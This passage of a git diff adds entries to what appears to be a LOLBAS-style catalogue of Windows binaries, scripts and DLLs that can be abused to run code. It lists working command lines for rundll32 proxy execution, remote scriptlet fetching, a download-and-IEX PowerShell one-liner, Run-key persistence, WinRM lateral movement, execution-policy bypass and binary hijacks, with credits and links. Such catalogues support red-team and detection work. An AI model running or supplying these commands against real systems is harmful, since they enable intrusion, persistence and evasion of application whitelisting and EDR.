* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe IEAdvpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,
|
||||
Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified).
|
||||
|
||||
rundll32.exe IEAdvpack.dll,LaunchINFSection test.inf,,1,
|
||||
Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied).
|
||||
|
||||
rundll32.exe IEAdvpack.dll,RegisterOCX calc.exe
|
||||
Launch executable by calling the RegisterOCX function.
|
||||
|
||||
rundll32.exe IEAdvpack.dll,RegisterOCX test.dll
|
||||
Launch a DLL payload by calling the RegisterOCX function.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/991695411902599168
|
||||
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
||||
* https://twitter.com/0rbz_/status/974472392012689408
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\ieadvpack.dll
|
||||
* c:\windows\sysWOW64\ieadvpack.dll
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (RegisterOCX - Cmd), Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL)
|
||||
|
22
OSLibraries/Ieframe.dll.md
Normal file
22
OSLibraries/Ieframe.dll.md
Normal file
@ -0,0 +1,22 @@
|
||||
## Ieframe.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
|
||||
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
|
||||
|
||||
rundll32.exe ieframe.dll,OpenURL c:\\test\\calc-url-file.zz
|
||||
Renamed URL file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
|
||||
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
||||
* https://twitter.com/bohops/status/997690405092290561
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Ieframe.dll
|
||||
* c:\windows\sysWOW64\Ieframe.dll
|
||||
|
||||
* Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops
|
||||
|
17
OSLibraries/Mshtml.dll.md
Normal file
17
OSLibraries/Mshtml.dll.md
Normal file
@ -0,0 +1,17 @@
|
||||
## Mshtml.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
|
||||
Invoke an HTML Application. Note - Pops a security warning and a print dialogue box.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/998567549670477824
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Mshtml.dll
|
||||
* c:\windows\sysWOW64\Mshtml.dll
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
17
OSLibraries/Pcwutl.dll.md
Normal file
17
OSLibraries/Pcwutl.dll.md
Normal file
@ -0,0 +1,17 @@
|
||||
## Pcwutl.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe pcwutl.dll,LaunchApplication calc.exe
|
||||
Launch executable by calling the LaunchApplication function.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/harr0ey/status/989617817849876488
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Pcwutl.dll
|
||||
* c:\windows\sysWOW64\Pcwutl.dll
|
||||
|
||||
* Notes: Thanks to Matt harr0ey - @harr0ey
|
||||
|
23
OSLibraries/Setupapi.dll.md
Normal file
23
OSLibraries/Setupapi.dll.md
Normal file
@ -0,0 +1,23 @@
|
||||
## Setupapi.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\temp\calc.inf
|
||||
Launch an executable file via the InstallHinfSection function and .inf file section directive.
|
||||
|
||||
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf
|
||||
Remote fetch and execute a COM Scriptlet by calling an information file directive.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/994742106852941825
|
||||
* https://twitter.com/subTee/status/951115319040356352
|
||||
* https://twitter.com/KyleHanslovan/status/911997635455852544
|
||||
* https://github.com/huntresslabs/evading-autoruns
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Setupapi.dll
|
||||
* c:\windows\sysWOW64\Setupapi.dll
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Executable), Kyle Hanslovan - @KyleHanslovan (COM Scriptlet), Huntress Labs - @HuntressLabs (COM Scriptlet), Casey Smith - @subTee (COM Scriptlet)
|
||||
|
22
OSLibraries/Shdocvw.dll.md
Normal file
22
OSLibraries/Shdocvw.dll.md
Normal file
@ -0,0 +1,22 @@
|
||||
## Shdocvw.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
|
||||
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
|
||||
|
||||
rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.zz"
|
||||
Renamed URL file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
|
||||
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
||||
* https://twitter.com/bohops/status/997690405092290561
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Shdocvw.dll
|
||||
* c:\windows\sysWOW64\Shdocvw.dll
|
||||
|
||||
* Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops
|
||||
|
26
OSLibraries/Shell32.dll.md
Normal file
26
OSLibraries/Shell32.dll.md
Normal file
@ -0,0 +1,26 @@
|
||||
## Shell32.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe shell32.dll,Control_RunDLL payload.dll
|
||||
Launch DLL payload.
|
||||
|
||||
rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
|
||||
Launch executable payload.
|
||||
|
||||
rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
|
||||
Launch executable payload with arguments.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/Hexacorn/status/885258886428725250
|
||||
* https://twitter.com/pabraeken/status/991768766898941953
|
||||
* https://twitter.com/mattifestation/status/776574940128485376
|
||||
* https://twitter.com/KyleHanslovan/status/905189665120149506
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\shell32.dll
|
||||
* c:\windows\sysWOW64\shell32.dll
|
||||
|
||||
* Notes: Thanks to Adam - @hexacorn (Control_RunDLL), Pierre-Alexandre Braeken - @pabraeken (ShellExec_RunDLL), Matt Graeber - @mattifestation (ShellExec_RunDLL), Kyle Hanslovan - @KyleHanslovan (ShellExec_RunDLL)
|
||||
|
22
OSLibraries/Syssetup.dll.md
Normal file
22
OSLibraries/Syssetup.dll.md
Normal file
@ -0,0 +1,22 @@
|
||||
## Syssetup.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.INF
|
||||
Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
|
||||
|
||||
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\\test\\shady.inf
|
||||
Remote fetch and execute a COM Scriptlet by calling an information file directive.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/994392481927258113
|
||||
* https://twitter.com/harr0ey/status/975350238184697857
|
||||
* https://twitter.com/bohops/status/975549525938135040
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Syssetup.dll
|
||||
* c:\windows\sysWOW64\Syssetup.dll
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Execute), Matt harr0ey - @harr0ey (Execute), Jimmy - @bohops (COM Scriptlet)
|
||||
|
36
OSLibraries/Url.dll.md
Normal file
36
OSLibraries/Url.dll.md
Normal file
@ -0,0 +1,36 @@
|
||||
## Url.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe url.dll,OpenURL "C:\\test\\calc.hta"
|
||||
Launch a HTML application payload by calling OpenURL.
|
||||
|
||||
rundll32.exe url.dll,OpenURL "C:\\test\\calc.url"
|
||||
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
|
||||
|
||||
rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
|
||||
Launch an executable payload by calling OpenURL.
|
||||
|
||||
rundll32.exe url.dll,FileProtocolHandler calc.exe
|
||||
Launch an executable payload by calling FileProtocolHandler.
|
||||
|
||||
rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
|
||||
Launch a HTML application payload by calling FileProtocolHandler.
|
||||
|
||||
rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
|
||||
Launch an executable payload by calling FileProtocolHandler.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
||||
* https://twitter.com/bohops/status/974043815655956481
|
||||
* https://twitter.com/DissectMalware/status/995348436353470465
|
||||
* https://twitter.com/yeyint_mth/status/997355558070927360
|
||||
* https://twitter.com/Hexacorn/status/974063407321223168
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\url.dll
|
||||
* c:\windows\sysWOW64\url.dll
|
||||
|
||||
* Notes: Thanks to Jimmy - @bohops (OpenURL), Adam - @hexacorn (OpenURL), Malwrologist - @DissectMalware (FileProtocolHandler - HTA), r0lan - @yeyint_mth (Obfuscation)
|
||||
|
21
OSLibraries/Zipfldr.dll.md
Normal file
21
OSLibraries/Zipfldr.dll.md
Normal file
@ -0,0 +1,21 @@
|
||||
## Zipfldr.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe zipfldr.dll,RouteTheCall calc.exe
|
||||
Launch an executable payload by calling RouteTheCall.
|
||||
|
||||
rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
|
||||
Launch an executable payload by calling RouteTheCall.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/moriarty_meng/status/977848311603380224
|
||||
* https://twitter.com/bohops/status/997896811904929792
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\zipfldr.dll
|
||||
* c:\windows\sysWOW64\zipfldr.dll
|
||||
|
||||
* Notes: Thanks to Moriarty - @moriarty_meng (Execute), r0lan - @yeyint_mth (Obfuscation)
|
||||
|
20
OSScripts/CL_Invocation.ps1.md
Normal file
20
OSScripts/CL_Invocation.ps1.md
Normal file
@ -0,0 +1,20 @@
|
||||
## CL_Invocation.ps1
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
. C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke <executable> [args]
|
||||
Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
|
||||
* https://twitter.com/bohops/status/948548812561436672
|
||||
* https://twitter.com/pabraeken/status/995107879345704961
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
|
||||
* C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
|
||||
* C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
|
||||
|
||||
* Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths)
|
||||
|
19
OSScripts/CL_Mutexverifiers.ps1.md
Normal file
19
OSScripts/CL_Mutexverifiers.ps1.md
Normal file
@ -0,0 +1,19 @@
|
||||
## CL_Mutexverifiers.ps1
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
. C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1
|
||||
runAfterCancelProcess calc.ps1
|
||||
Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/995111125447577600
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
||||
* C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
|
||||
* C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate)
|
||||
|
20
OSScripts/Manage-bde.wsf.md
Normal file
20
OSScripts/Manage-bde.wsf.md
Normal file
@ -0,0 +1,20 @@
|
||||
## Manage-bde.wsf
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf
|
||||
Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.
|
||||
|
||||
copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
|
||||
Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
|
||||
* https://twitter.com/bohops/status/980659399495741441
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\manage-bde.wsf
|
||||
|
||||
* Notes: Thanks to Jimmy - @bophops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack)
|
||||
|
19
OSScripts/Pubprn.vbs.md
Normal file
19
OSScripts/Pubprn.vbs.md
Normal file
@ -0,0 +1,19 @@
|
||||
## Pubprn.vbs
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
|
||||
Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
|
||||
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
|
||||
* https://github.com/enigma0x3/windows-operating-system-archaeology
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
||||
* C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
|
||||
|
||||
* Notes: Thanks to Matt Nelson - @enigma0x3
|
||||
|
18
OSScripts/Slmgr.vbs.md
Normal file
18
OSScripts/Slmgr.vbs.md
Normal file
@ -0,0 +1,18 @@
|
||||
## Slmgr.vbs
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs
|
||||
Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
|
||||
* https://www.youtube.com/watch?v=3gz1QmiMhss
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\slmgr.vbs
|
||||
* c:\windows\sysWOW64\slmgr.vbs
|
||||
|
||||
* Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee
|
||||
|
17
OSScripts/SyncAppvPublishingServer.vbs.md
Normal file
17
OSScripts/SyncAppvPublishingServer.vbs.md
Normal file
@ -0,0 +1,17 @@
|
||||
## SyncAppvPublishingServer.vbs
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
|
||||
Inject PowerShell script code with the provided arguments
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/monoxgas/status/895045566090010624
|
||||
* https://twitter.com/subTee/status/855738126882316288
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\SyncAppvPublishingServer.vbs
|
||||
|
||||
* Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee
|
||||
|
27
OSScripts/Winrm.vbs.md
Normal file
27
OSScripts/Winrm.vbs.md
Normal file
@ -0,0 +1,27 @@
|
||||
## Winrm.vbs
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig
|
||||
Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
|
||||
|
||||
winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985
|
||||
Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol.
|
||||
|
||||
winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985
|
||||
Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
|
||||
* https://www.youtube.com/watch?v=3gz1QmiMhss
|
||||
* https://github.com/enigma0x3/windows-operating-system-archaeology
|
||||
* https://redcanary.com/blog/lateral-movement-winrm-wmi/
|
||||
* https://twitter.com/bohops/status/994405551751815170
|
||||
|
||||
* Full path:
|
||||
* C:\windows\system32\winrm.vbs
|
||||
* C:\windows\SysWOW64\winrm.vbs
|
||||
|
||||
* Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM)
|
||||
|
18
OSScripts/pester.bat.md
Normal file
18
OSScripts/pester.bat.md
Normal file
@ -0,0 +1,18 @@
|
||||
## pester.bat
|
||||
* Functions: Execute code using Pester. The third parameter can be anything. The fourth is the payload.
|
||||
```
|
||||
|
||||
Pester.bat [/help|?|-?|/?] "$null; notepad"
|
||||
Execute notepad
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/Oddvarmoe/status/993383596244258816
|
||||
* https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/pester.md
|
||||
|
||||
* Full path:
|
||||
* c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
|
||||
* c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
|
||||
|
||||
* Notes: Thanks to Emin Atac - @p0w3rsh3ll
|
||||
|
16
OtherBinaries/AcroRd32.exe.md
Normal file
16
OtherBinaries/AcroRd32.exe.md
Normal file
@ -0,0 +1,16 @@
|
||||
## AcroRd32.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
||||
Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/997997818362155008
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
16
OtherBinaries/Gpup.exe.md
Normal file
16
OtherBinaries/Gpup.exe.md
Normal file
@ -0,0 +1,16 @@
|
||||
## Gpup.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
||||
Execute another command through gpup.exe (Notepad++ binary).
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/997892519827558400
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files (x86)\Notepad++\updater\gpup.exe
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
17
OtherBinaries/Nlnotes.exe.md
Normal file
17
OtherBinaries/Nlnotes.exe.md
Normal file
@ -0,0 +1,17 @@
|
||||
## Nlnotes.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
Run PowerShell via LotusNotes.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||
* https://twitter.com/HanseSecure/status/995578436059127808
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe
|
||||
|
||||
* Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
||||
|
17
OtherBinaries/Notes.exe.md
Normal file
17
OtherBinaries/Notes.exe.md
Normal file
@ -0,0 +1,17 @@
|
||||
## Notes.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
Run PowerShell via LotusNotes.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||
* https://twitter.com/HanseSecure/status/995578436059127808
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
|
||||
|
||||
* Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
||||
|
31
OtherBinaries/Nvudisp.exe.md
Normal file
31
OtherBinaries/Nvudisp.exe.md
Normal file
@ -0,0 +1,31 @@
|
||||
## Nvudisp.exe
|
||||
* Functions: Execute, Copy, Add registry, Create shortcut, kill process
|
||||
```
|
||||
|
||||
Nvudisp.exe System calc.exe
|
||||
Execute calc.exe as a subprocess.
|
||||
|
||||
Nvudisp.exe Copy test.txt,test-2.txt
|
||||
Copy fila A to file B.
|
||||
|
||||
Nvudisp.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
|
||||
Add/Edit a Registry key value.
|
||||
|
||||
Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\"
|
||||
Create shortcut file.
|
||||
|
||||
Nvudisp.exe KillApp calculator.exe
|
||||
Kill a process.
|
||||
|
||||
Nvudisp.exe Run foo
|
||||
Run process
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
|
||||
|
||||
* Full path:
|
||||
* C:\windows\system32\nvuDisp.exe
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
31
OtherBinaries/Nvuhda6.exe.md
Normal file
31
OtherBinaries/Nvuhda6.exe.md
Normal file
@ -0,0 +1,31 @@
|
||||
## Nvuhda6.exe
|
||||
* Functions: Execute, Copy, Add registry, Create shortcut, kill process
|
||||
```
|
||||
|
||||
nvuhda6.exe System calc.exe
|
||||
Execute calc.exe as a subprocess.
|
||||
|
||||
nvuhda6.exe Copy test.txt,test-2.txt
|
||||
Copy fila A to file B.
|
||||
|
||||
nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
|
||||
Add/Edit a Registry key value
|
||||
|
||||
nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\"
|
||||
Create shortcut file.
|
||||
|
||||
nvuhda6.exe KillApp calc.exe
|
||||
Kill a process.
|
||||
|
||||
nvuhda6.exe Run foo
|
||||
Run process
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
|
||||
|
||||
* Full path:
|
||||
* Missing
|
||||
|
||||
* Notes: Thanks to Adam - @hexacorn
|
||||
|
16
OtherBinaries/ROCCAT_Swarm.exe.md
Normal file
16
OtherBinaries/ROCCAT_Swarm.exe.md
Normal file
@ -0,0 +1,16 @@
|
||||
## ROCCAT_Swarm.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
||||
Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/994213164484001793
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
16
OtherBinaries/Setup.exe.md
Normal file
16
OtherBinaries/Setup.exe.md
Normal file
@ -0,0 +1,16 @@
|
||||
## Setup.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Run Setup.exe
|
||||
Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/994381620588236800
|
||||
|
||||
* Full path:
|
||||
* C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
16
OtherBinaries/Usbinst.exe.md
Normal file
16
OtherBinaries/Usbinst.exe.md
Normal file
@ -0,0 +1,16 @@
|
||||
## Usbinst.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
||||
Execute calc.exe through DefaultInstall Section Directive in INF file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/993514357807108096
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
16
OtherBinaries/VBoxDrvInst.exe.md
Normal file
16
OtherBinaries/VBoxDrvInst.exe.md
Normal file
@ -0,0 +1,16 @@
|
||||
## VBoxDrvInst.exe
|
||||
* Functions: Persistence
|
||||
```
|
||||
|
||||
VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
||||
Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/993497996179492864
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files\Oracle\VirtualBox Guest Additions
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
24
OtherMSBinaries/Appvlp.exe.md
Normal file
24
OtherMSBinaries/Appvlp.exe.md
Normal file
@ -0,0 +1,24 @@
|
||||
## Appvlp.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
AppVLP.exe \\webdav\calc.bat
|
||||
Executes calc.bat through AppVLP.exe
|
||||
|
||||
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
|
||||
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
|
||||
|
||||
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
|
||||
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://github.com/MoooKitty/Code-Execution
|
||||
* https://twitter.com/moo_hax/status/892388990686347264
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files\Microsoft Office\root\client\appvlp.exe
|
||||
* C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
|
||||
|
||||
* Notes: Thanks to fab - @0rbz_ (No record), Will - @moo_hax (Code Execution)
|
||||
|
22
OtherMSBinaries/Bginfo.exe.md
Normal file
22
OtherMSBinaries/Bginfo.exe.md
Normal file
@ -0,0 +1,22 @@
|
||||
## Bginfo.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Execute VBscript code that is referenced within the bginfo.bgi file.
|
||||
|
||||
"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt
|
||||
Execute bginfo.exe from a WebDAV server.
|
||||
|
||||
"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
|
||||
This style of execution may not longer work due to patch.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
|
||||
|
||||
* Full path:
|
||||
* No fixed path
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
